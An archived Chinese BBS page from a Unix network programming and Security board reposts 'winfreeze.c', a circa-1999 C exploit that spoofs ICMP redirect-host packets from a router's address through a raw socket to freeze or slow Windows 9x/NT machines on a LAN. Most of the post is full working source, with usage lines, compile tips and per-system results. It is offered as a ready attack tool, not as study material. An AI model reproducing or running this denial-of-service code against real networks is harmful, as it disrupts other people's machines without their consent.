📄 331.htm
字号:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>CTerm非常精华下载</title>
</head>
<body bgcolor="#FFFFFF">
<table border="0" width="100%" cellspacing="0" cellpadding="0" height="577">
<tr><td width="32%" rowspan="3" height="123"><img src="DDl_back.jpg" width="300" height="129" alt="DDl_back.jpg"></td><td width="30%" background="DDl_back2.jpg" height="35"><p align="center"><a href="http://apue.dhs.org"><font face="黑体"><big><big>apue</big></big></font></a></td></tr>
<tr>
<td width="68%" background="DDl_back2.jpg" height="44"><big><big><font face="黑体"><p align="center"> ● UNIX网络编程 (BM: clown) </font></big></big></td></tr>
<tr>
<td width="68%" height="44" bgcolor="#000000"><font face="黑体"><big><big><p align="center"></big></big><a href="http://cterm.163.net"><img src="banner.gif" width="400" height="60" alt="banner.gif"border="0"></a></font></td>
</tr>
<tr><td width="100%" colspan="2" height="100" align="center" valign="top"><br><p align="center">[<a href="index.htm">回到开始</a>][<a href="184.htm">上一层</a>][<a href="332.htm">下一篇</a>]
<hr><p align="left"><small>发信人: cloudsky (小四), 信区: Security <br>
标 题: winfreeze.c <br>
发信站: 武汉白云黄鹤站 (Mon Apr 10 11:59:40 2000), 站内信件 <br>
/* <br>
WinFreez.c by Delmore <delmore@moscowmail.com> <br>
ICMP/Redirect-host message storm freeze Win9x/NT(sp4) box <br>
in LAN. <br>
Usage: winfreez sendtoip sendfromip time <br>
where <sendtoip> is victim host, <sendfromip> is router <br>
for victim host, <time> is time in seconds to freeze victim. <br>
Note: <br>
I've written small exploit for freeze win9x/nt boxes in LAN. <br>
Proggy initiates ICMP/Redirect-host messages storm from router <br>
(use router ip). Windows will receive redirect-host messages <br>
and change own route table, therefore it will be frozen <br>
or slowly working during this time. <br>
On victim machine route table changes viewing with: <br>
ROUTE PRINT <br>
command in ms-dos box. <br>
Exploit show different result for different system configuration. <br>
System results: <br>
p200/16ram/win95osr2 is slowly execute application <br>
after 20 seconds of storm. <br>
p233/96ram/nt4-sp4 is slowly working after 30 <br>
seconds of storm. <br>
p2-266/64ram/win95 working slowly and can't normal execute <br>
application. <br>
Compiled on RedHat Linux 5, Kernel 2.0.35 (x86) <br>
gcc ./winfreez.c -o winfreez <br>
--- for Slackware Linux, Kernel 2.0.30 <br>
If you can't compile due to ip_sum not defined errors, <br>
replace (line 207): <br>
ip->ip_sum = 0; <br>
to line: <br>
ip->ip_csum = 0; <br>
--- <br>
Soldiers Of Satan group <br>
Russia, Moscow State University, 05 march 1999 <br>
http://sos.nanko.ru <br>
Thanx to Mark Henderson. <br>
*/ <br>
#include <stdio.h> <br>
#include <stdlib.h> <br>
#include <time.h> <br>
#include <string.h> <br>
#include <sys/types.h> <br>
#include <sys/socket.h> <br>
#include <netdb.h> <br>
#include <netinet/in.h> <br>
#include <netinet/in_systm.h> <br>
#include <netinet/ip.h> <br>
#include <netinet/ip_icmp.h> <br>
/* <br>
* Structure of an icmp header (from sparc header). <br>
*/ <br>
struct icmp { <br>
u_char icmp_type; /* type of message, see below */ <br>
u_char icmp_code; /* type sub code */ <br>
u_short icmp_cksum; /* ones complement cksum of struct */ <br>
union { <br>
u_char ih_pptr; /* ICMP_PARAMPROB */ <br>
struct in_addr ih_gwaddr; /* ICMP_REDIRECT */ <br>
struct ih_idseq { <br>
n_short icd_id; <br>
n_short icd_seq; <br>
} ih_idseq; <br>
int ih_void; <br>
int ih_void; <br>
} icmp_hun; <br>
#define icmp_pptr icmp_hun.ih_pptr <br>
#define icmp_gwaddr icmp_hun.ih_gwaddr <br>
#define icmp_id icmp_hun.ih_idseq.icd_id <br>
#define icmp_seq icmp_hun.ih_idseq.icd_seq <br>
#define icmp_void icmp_hun.ih_void <br>
union { <br>
struct id_ts { <br>
n_time its_otime; <br>
n_time its_rtime; <br>
n_time its_ttime; <br>
} id_ts; <br>
struct id_ip { <br>
struct ip idi_ip; <br>
/* options and then 64 bits of data */ <br>
} id_ip; <br>
u_long id_mask; <br>
char id_data[1]; <br>
} icmp_dun; <br>
#define icmp_otime icmp_dun.id_ts.its_otime <br>
#define icmp_rtime icmp_dun.id_ts.its_rtime <br>
#define icmp_ttime icmp_dun.id_ts.its_ttime <br>
#define icmp_ip icmp_dun.id_ip.idi_ip <br>
#define icmp_mask icmp_dun.id_mask <br>
#define icmp_data icmp_dun.id_data <br>
}; <br>
u_short in_cksum (u_short *addr, int len); <br>
void attack( char *sendtoip, char *sendfromip, time_t wtime, int s ); <br>
void main (int argc, char **argv) <br>
{ <br>
time_t wtime; <br>
char *sendtoip, *sendfromip; <br>
int s, on; <br>
if (argc != 4) <br>
{ <br>
fprintf (stderr, "usage: %s sendto sendfrom time\n", argv[0]); <br>
exit (1); <br>
} <br>
sendtoip = (char *)malloc(strlen(argv[1]) + 1); <br>
strcpy(sendtoip, argv[1]); <br>
sendfromip = (char *)malloc(strlen(argv[2]) + 1); <br>
strcpy(sendfromip, argv[2]); <br>
wtime = atol(argv[3]); <br>
if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) <br>
{ <br>
fprintf (stderr, "socket creation error\n" ); <br>
exit (1); <br>
} <br>
#ifdef IP_HDRINCL <br>
if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, &on, sizeof (on)) < 0) <br>
{ <br>
fprintf (stderr, "sockopt IP_HDRINCL error\n" ); <br>
exit (1); <br>
} <br>
#endif <br>
printf("winfreez by Delmore, <delmore@moscowmail.com>\n"); <br>
printf("Soldiers Of Satan group, http://sos.nanko.ru\n\n"); <br>
printf("sendto = %s\n", sendtoip); <br>
printf("sendfrom = %s\n", sendfromip); <br>
printf("time = %i s\n", wtime); <br>
attack( sendtoip, sendfromip, wtime, s ); <br>
free( (void *) sendtoip ); <br>
free( (void *) sendfromip ); <br>
} <br>
void attack( char *sendtoip, char *sendfromip, time_t wtime, int s ) <br>
{ <br>
{ <br>
time_t curtime, endtime; <br>
int i1, i2, i3, i4; <br>
char redir[21]; <br>
char buf[100]; <br>
struct ip *ip = (struct ip *) buf; <br>
struct icmp *icmp = (struct icmp *) (ip + 1); <br>
struct hostent *hp; <br>
struct sockaddr_in dst; <br>
if(wtime==0) return; <br>
if ((hp = gethostbyname (sendtoip)) == NULL) <br>
if ((ip->ip_dst.s_addr = inet_addr (sendtoip)) == -1) <br>
{ <br>
fprintf (stderr, "%s: unknown sendto\n", sendtoip); <br>
exit (1); <br>
} <br>
if ((hp = gethostbyname (sendfromip)) == NULL) <br>
if ((ip->ip_src.s_addr = inet_addr (sendfromip)) == -1) <br>
{ <br>
fprintf (stderr, "%s: unknown sendfrom\n", sendfromip); <br>
exit (1); <br>
} <br>
endtime = time(NULL) + wtime; <br>
srand((unsigned int) endtime); <br>
do { <br>
bzero (buf, sizeof buf); <br>
/* sendto/gateway */ <br>
hp = gethostbyname (sendtoip); <br>
bcopy (hp->h_addr_list[0], &ip->ip_dst.s_addr, hp->h_length); <br>
bcopy (hp->h_addr_list[0], &icmp->icmp_gwaddr.s_addr, hp->h_length); <br>
/* sendfrom */ <br>
hp = gethostbyname (sendfromip); <br>
bcopy (hp->h_addr_list[0], &ip->ip_src.s_addr, hp->h_length); <br>
/* generate redirect*/ <br>
i1 = 1+(int) (223.0*rand()/(RAND_MAX+1.0)); <br>
i2 = 1+(int) (253.0*rand()/(RAND_MAX+1.0)); <br>
i3 = 1+(int) (253.0*rand()/(RAND_MAX+1.0)); <br>
i4 = 1+(int) (253.0*rand()/(RAND_MAX+1.0)); <br>
bzero (redir, sizeof redir); <br>
sprintf(redir,"%u.%u.%u.%u", i4, i3, i2, i1 ); <br>
hp = gethostbyname (redir); <br>
bcopy (hp->h_addr_list[0], &icmp->icmp_ip.ip_dst.s_addr, hp->h_length); <br>
ip->ip_v = 4; <br>
ip->ip_hl = sizeof *ip >> 2; <br>
ip->ip_tos = 0; <br>
ip->ip_len = htons (sizeof buf); <br>
ip->ip_id = htons (4321); <br>
ip->ip_off = 0; <br>
ip->ip_ttl = 255; <br>
ip->ip_p = 1; <br>
ip->ip_sum = 0; /* kernel fills this in */ <br>
bcopy (&ip->ip_dst.s_addr, &icmp->icmp_ip.ip_src.s_addr, sizeof(ip->ip_dst <br>
.s_a <br>
ddr)); <br>
icmp->icmp_ip.ip_v = 4; <br>
icmp->icmp_ip.ip_hl = sizeof *ip >> 2; <br>
icmp->icmp_ip.ip_tos = 0; <br>
icmp->icmp_ip.ip_len = htons (100); /* doesn't matter much */ <br>
icmp->icmp_ip.ip_id = htons (3722); <br>
icmp->icmp_ip.ip_off = 0; <br>
icmp->icmp_ip.ip_ttl = 254; <br>
icmp->icmp_ip.ip_p = 1; <br>
icmp->icmp_ip.ip_sum = in_cksum ((u_short *) & icmp->icmp_ip, sizeof *ip); <br>
<br>
dst.sin_addr = ip->ip_dst; <br>
dst.sin_family = AF_INET; <br>
icmp->icmp_type = ICMP_REDIRECT; <br>
icmp->icmp_code = 1; /* 1 - redirect host, 0 - redirect net */ <br>
icmp->icmp_cksum = in_cksum ((u_short *) icmp, sizeof (buf) - sizeof(*ip)) <br>
; <br>
if( sendto( s, buf, sizeof buf, 0, (struct sockaddr *) &dst, sizeof dst) < <br>
0 ) <br>
{ <br>
fprintf (stderr, "sendto error\n"); <br>
exit (1); <br>
} <br>
}while (time(NULL)!=endtime); <br>
} <br>
/* <br>
* in_cksum -- Checksum routine for Internet Protocol family headers (C <br>
* Version) - code from 4.4 BSD <br>
*/ <br>
u_short in_cksum (u_short *addr, int len) <br>
{ <br>
register int nleft = len; <br>
register u_short *w = addr; <br>
register int sum = 0; <br>
u_short answer = 0; <br>
/* <br>
/* <br>
* Our algorithm is simple, using a 32 bit accumulator (sum), we add <br>
* sequential 16 bit words to it, and at the end, fold back all the <br>
* carry bits from the top 16 bits into the lower 16 bits. <br>
*/ <br>
while (nleft > 1) <br>
{ <br>
sum += *w++; <br>
nleft -= 2; <br>
} <br>
/* mop up an odd byte, if necessary */ <br>
if (nleft == 1) <br>
{ <br>
*(u_char *) (&answer) = *(u_char *) w; <br>
sum += answer; <br>
} <br>
/* add back carry outs from top 16 bits to low 16 bits */ <br>
sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */ <br>
sum += (sum >> 16); /* add carry */ <br>
answer = ~sum; /* truncate to 16 bits */ <br>
return (answer); <br>
} <br>
-- <br>
我问飘逝的风:来迟了? <br>
风感慨:是的,他们已经宣战。 <br>
我问苏醒的大地:还有希望么? <br>
大地揉了揉眼睛:还有,还有无数代的少年。 <br>
我问长空中的英魂:你们相信? <br>
英魂带着笑意离去:相信,希望还在。 <br>
</small><hr>
<p align="center">[<a href="index.htm">回到开始</a>][<a href="184.htm">上一层</a>][<a href="332.htm">下一篇</a>]
<p align="center"><a href="http://cterm.163.net">欢迎访问Cterm主页</a></p>
</table>
</body>
</html>⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -